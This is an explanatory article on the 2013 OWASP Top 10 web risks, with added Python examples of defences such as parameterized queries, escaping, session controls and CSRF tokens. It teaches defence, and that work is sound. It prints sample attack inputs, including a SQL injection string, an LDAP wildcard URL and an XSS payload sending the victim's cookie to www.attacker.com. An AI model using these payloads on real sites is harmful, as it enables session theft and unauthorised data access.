OWASP Top 10 Vulnerabilities

The OWASP Top Ten is an awareness document for web application security. This article lists the ten most critical web application security risks as published in the OWASP Top 10 for 2013, with a short description of each.

OWASP

The Open Web Application Security Project (OWASP) is a worldwide not-for-profit charitable organization focused on improving the security of software and websites.

1. Injection

Injection flaws occur when untrusted data is sent to an interpreter (a SQL database, the OS shell, an LDAP directory) as part of a command or query, so that the data is executed rather than treated as data. Common types of injection are:

  1. SQL injection (occurs when a user-supplied value is concatenated into a SQL statement instead of being passed as a parameter, and is neither escaped nor checked against type constraints). If the attacker enters ' OR '1'='1' -- as the name, the query becomes the following; the -- comments out the rest of the statement and every row is returned:

    SELECT * FROM Authentication WHERE name = '' OR '1'='1' --

  2. OS command injection (occurs when your application runs external programs with user-controlled arguments, for example through System.Diagnostics.Process.Start in .NET, and the input reaches a shell that interprets it).

  3. LDAP injection (occurs when an LDAP search filter is built from user input, for example when the site authenticates users against Active Directory). Filter metacharacters in a user-controlled value change the query; a bare wildcard can match every entry in the directory:

    http://www.mysite.com/Auther.aspx?uid=*
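The following is an added example, not code from the original article: it runs the SQL injection above against a constructed in-memory SQLite table, shows the same lookup with a parameterized query, and escapes an LDAP filter value (RFC 4515) so that the uid=* case no longer acts as a wildcard. The table, user names and the uid_filter helper are assumptions made for the example.

```python
# Added example (not from the original article). Sample data is constructed.
import sqlite3


def setup_db():
    """Constructed sample data: a tiny Authentication table with two users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Authentication (name TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO Authentication VALUES (?, ?)",
        [("alice", "s3cret"), ("bob", "hunter2")],
    )
    return conn


def login_vulnerable(conn, name, password):
    """String concatenation: the user's input becomes part of the SQL text.
    name = "' OR '1'='1' --" turns the WHERE clause into
    name = '' OR '1'='1' --' AND password = ''  (rest commented out)."""
    sql = (
        "SELECT name FROM Authentication WHERE name = '" + name
        + "' AND password = '" + password + "'"
    )
    return sorted(row[0] for row in conn.execute(sql))


def login_safe(conn, name, password):
    """Parameterized query: the driver binds input as data, never as SQL,
    so the same payload is simply a user name that does not exist."""
    sql = "SELECT name FROM Authentication WHERE name = ? AND password = ?"
    return sorted(row[0] for row in conn.execute(sql, (name, password)))


# LDAP filter escaping per RFC 4515 section 3. Backslash must be handled too,
# otherwise an attacker can supply an already-escaped sequence.
_LDAP_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}


def ldap_escape_filter_value(value):
    """Escape a value for use inside an LDAP search filter assertion."""
    return "".join(_LDAP_ESCAPES.get(ch, ch) for ch in value)


def uid_filter(uid):
    """Hypothetical helper: build the (uid=...) filter from a request parameter."""
    return "(uid=" + ldap_escape_filter_value(uid) + ")"


if __name__ == "__main__":
    db = setup_db()
    payload = "' OR '1'='1' --"
    print("vulnerable:", login_vulnerable(db, payload, ""))   # every user
    print("safe:      ", login_safe(db, payload, ""))         # nobody
    print("ldap:      ", uid_filter("*"))                     # (uid=\2a)
```

The escaping only protects the value position inside a filter; user input must never be allowed to supply the attribute name or the filter structure itself.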

2. Broken Authentication and Session Management

This type of security issue is caused by the following:

  1. Authentication credentials aren't protected properly.
  2. Weak session IDs.
  3. SessionIDs are exposed in the URL.
  4. Session IDs don't time out
  5. Session IDs aren't rotated after successful login
  6. Passwords, session IDs, and other credentials are sent over unencrypted connections
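As an added example (not code from the original article), the session store below implements the controls that items 2 to 6 call for: session IDs drawn from the OS random source, idle and absolute timeouts, a fresh ID issued at login, and a cookie carrying the ID instead of the URL. The class and attribute names are assumptions for this example, not any framework's API; the injectable clock exists only so the timeouts can be exercised without waiting.

```python
# Added example (not from the original article). Names are illustrative.
import secrets
import time

IDLE_TIMEOUT = 15 * 60        # seconds of inactivity before a session expires
ABSOLUTE_TIMEOUT = 8 * 3600   # hard lifetime regardless of activity


class Session:
    def __init__(self, now, user=None):
        self.user = user          # None until the user authenticates
        self.created = now
        self.last_seen = now


class SessionStore:
    def __init__(self, clock=time.time):
        self._sessions = {}       # session id -> Session (server side only)
        self._clock = clock

    def _new_id(self):
        # 32 bytes from the OS CSPRNG: never a counter, timestamp or hash of
        # the user name, which an attacker could guess (item 2).
        return secrets.token_urlsafe(32)

    def create(self):
        sid = self._new_id()
        self._sessions[sid] = Session(self._clock())
        return sid

    def get(self, sid):
        """Look up a session, enforcing both timeouts (item 4)."""
        s = self._sessions.get(sid)
        if s is None:
            return None
        now = self._clock()
        if now - s.last_seen > IDLE_TIMEOUT or now - s.created > ABSOLUTE_TIMEOUT:
            del self._sessions[sid]
            return None
        s.last_seen = now
        return s

    def login(self, sid, user):
        """Bind the user to a new session ID (item 5). A pre-login ID an
        attacker planted in the victim's browser (session fixation) is
        discarded, so knowing it gives them nothing after authentication."""
        self._sessions.pop(sid, None)
        new_sid = self._new_id()
        self._sessions[new_sid] = Session(self._clock(), user=user)
        return new_sid


def cookie_header(sid):
    """Set-Cookie line for items 3 and 6: the ID travels in a cookie, only
    over HTTPS, unreadable by script, and not attached to cross-site requests."""
    return "Set-Cookie: sid=%s; Secure; HttpOnly; SameSite=Lax; Path=/" % sid


if __name__ == "__main__":
    store = SessionStore()
    anon = store.create()
    authed = store.login(anon, "alice")
    print(cookie_header(authed))
    print("old id still valid:", store.get(anon) is not None)   # False
```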

3. Cross-Site Scripting (XSS)

This type of security issue occurs whenever an application includes user-supplied data in a page sent to the browser without escaping it for the context where it is placed, or without validating that it is safe, as in the following code that builds HTML by string concatenation:

page += "<input name='mycarddetails' type='TEXT' value='" + request.getParameter("DB") + "'>";

The attacker can modify the "DB" parameter in their browser to close the attribute and inject a script that sends the session cookie to a server they control:

'><script>document.location='http://www.attacker.com/dataforge.cgi?foo='+document.cookie</script>
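As an added example (not code from the original article), the page-building line above is reproduced in Python beside a version that escapes the parameter for an HTML attribute, with the attacker's "DB" value from the text as the constructed input. The function names are assumptions for this example.

```python
# Added example (not from the original article). ATTACK is the payload from the text.
import html

ATTACK = ("'><script>document.location="
          "'http://www.attacker.com/dataforge.cgi?foo='+document.cookie</script>")


def render_vulnerable(db):
    """Untrusted input concatenated straight into the markup, as in the snippet."""
    return "<input name='mycarddetails' type='TEXT' value='" + db + "'>"


def render_safe(db):
    """html.escape with quote=True turns & < > " and ' into entities, so the
    value can neither close the single-quoted attribute nor open a tag."""
    escaped = html.escape(db, quote=True)
    return "<input name='mycarddetails' type='TEXT' value='" + escaped + "'>"


def script_tags(markup):
    """Crude check used below: count raw <script openings in rendered HTML."""
    return markup.lower().count("<script")


if __name__ == "__main__":
    print(render_vulnerable(ATTACK))   # attribute closed, script injected
    print(render_safe(ATTACK))         # payload shown as harmless text
```

Escaping is context specific: the entity encoding above is right for HTML text and attribute values, but data placed inside a script block, a URL or a CSS property needs the encoder for that context.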

4. Insecure Direct Object References

This type of security issue occurs when the application exposes a direct reference to an internal object (a database key, file name or account number) and fails to verify that the user is authorized to access the exact resource they requested. An attacker simply changes the reference to reach another user's data:

http://example.com/app/accountInfo?acct=notmyacct

5. Security Misconfiguration

This type of security issue occurs if your software is out of date, unnecessary features are enabled or installed, default accounts and their passwords are still enabled and unchanged, error handling reveals stack traces or other internal details, or the security settings of your development frameworks, application server and libraries are not set to secure values.

6. Sensitive Data Exposure

This type of security issue occurs if sensitive data (credentials, credit card numbers, health records, personal data) is not adequately protected at rest, in transit or in the browser: for example stored in plaintext or as an unsalted hash, sent over unencrypted connections, cached by the browser, or protected with weak algorithms or poorly managed keys.

7. Missing Function Level Access Control

This type of security issue occurs when the application does not check authorization on the server for each function it exposes, but only hides links or buttons in the user interface. Anyone with network access can then request the privileged functionality directly (for example by typing an administrative URL) and use it as if they were an authorized user.
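The following added example (not code from the original article) serves both risk 4 above and this one: an object-level ownership check for a request like accountInfo?acct=..., and a function-level role check enforced by the function itself so that every route, link or hand-typed URL reaches it. The users, roles and account records are constructed sample data, and the decorator and helper names are assumptions for the example.

```python
# Added example (not from the original article). Sample data is constructed.
from functools import wraps


class Forbidden(Exception):
    pass


ROLES = {"alice": {"user"}, "bob": {"user"}, "carol": {"user", "admin"}}
ACCOUNTS = {
    "acct-1001": {"owner": "alice", "balance": 120.0},
    "acct-1002": {"owner": "bob", "balance": 55.5},
}


def require_role(role):
    """Function-level access control: the check travels with the function,
    so hiding the link in the UI is no longer the only protection."""
    def decorator(fn):
        @wraps(fn)
        def wrapper(current_user, *args, **kwargs):
            if role not in ROLES.get(current_user, set()):
                raise Forbidden("%s lacks role %s" % (current_user, role))
            return fn(current_user, *args, **kwargs)
        return wrapper
    return decorator


def account_info_vulnerable(current_user, acct):
    """Trusts the direct reference from the URL: any logged-in user can read
    any account just by changing acct=."""
    return ACCOUNTS[acct]


def account_info(current_user, acct):
    """Object-level fix: verify the requested object belongs to the requester.
    Missing and foreign accounts get the same answer, so the response does
    not reveal which account numbers exist."""
    record = ACCOUNTS.get(acct)
    if record is None or record["owner"] != current_user:
        raise Forbidden("%s may not access %s" % (current_user, acct))
    return record


@require_role("admin")
def list_all_accounts(current_user):
    return sorted(ACCOUNTS)


def is_denied(fn, *args):
    """Helper: True if the call is refused with Forbidden."""
    try:
        fn(*args)
    except Forbidden:
        return True
    return False


if __name__ == "__main__":
    print(account_info_vulnerable("alice", "acct-1002"))   # bob's data leaks
    print(is_denied(account_info, "alice", "acct-1002"))   # True
    print(is_denied(list_all_accounts, "alice"))           # True
    print(list_all_accounts("carol"))                      # admin succeeds
```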

8. Cross-Site Request Forgery

This type of security issue occurs when an attacker forces the victim's browser to send a forged request, carrying the victim's session cookie and any other automatically included credentials, to a vulnerable application in which the victim is currently authenticated. The application cannot tell the forged request from a legitimate one.
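As an added example (not code from the original article), the code below implements the synchronizer token pattern: a random per-session token is embedded in each form and checked on every state-changing request. A page on the attacker's site can make the browser submit the form, but it cannot read the token out of the victim's page, so the forged request is rejected. The request dictionaries, the /transfer handler and the store are constructed for the example and are not any framework's API.

```python
# Added example (not from the original article). Requests are plain dicts.
import hmac
import secrets

_csrf_tokens = {}   # session id -> token, kept server side


def issue_csrf_token(session_id):
    token = secrets.token_hex(32)
    _csrf_tokens[session_id] = token
    return token


def render_form(session_id):
    """Embed the session's token in the form the legitimate page serves."""
    token = issue_csrf_token(session_id)
    return ('<form method="POST" action="/transfer">'
            '<input type="hidden" name="csrf_token" value="%s">'
            '<input name="amount"><input type="submit"></form>' % token)


def csrf_ok(request):
    """request = {"method": ..., "cookies": {...}, "form": {...}}."""
    if request["method"] in ("GET", "HEAD", "OPTIONS"):
        return True   # safe methods must not change state, so no token needed
    expected = _csrf_tokens.get(request["cookies"].get("sid"))
    supplied = request["form"].get("csrf_token", "")
    if expected is None:
        return False
    return hmac.compare_digest(expected, supplied)   # constant-time compare


def transfer(request):
    if not csrf_ok(request):
        return "403 Forbidden"
    return "transferred " + request["form"]["amount"]


def forged_request(victim_sid, amount):
    """What the attacker's page makes the victim's browser send: the cookie
    goes along automatically, but the attacker never learns the token."""
    return {"method": "POST", "cookies": {"sid": victim_sid},
            "form": {"amount": amount}}


if __name__ == "__main__":
    form = render_form("sess-1")
    token = form.split('value="')[1].split('"')[0]
    legit = {"method": "POST", "cookies": {"sid": "sess-1"},
             "form": {"csrf_token": token, "amount": "10"}}
    print(transfer(legit))                              # transferred 10
    print(transfer(forged_request("sess-1", "9999")))   # 403 Forbidden
```

Setting the session cookie with SameSite=Lax (see the session example earlier) is a useful second layer, but the token check is what protects browsers and requests that SameSite does not cover.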

9. Using Components with Known Vulnerabilities

This type of security issue occurs when the application uses libraries, frameworks or other software components (often running with full privileges) that have publicly known vulnerabilities. An attacker identifies the vulnerable component and its version in the website and attacks it, using the published exploit, to compromise the application.

10. Unvalidated Redirects and Forwards

This type of security issue occurs when a web application accepts untrusted input, typically a URL in a parameter, and uses it to redirect or forward the request to that destination without validating it. An attacker can then send victims a link on the trusted site that lands them on a phishing or malware page, or use a forward to reach a page that bypasses access checks.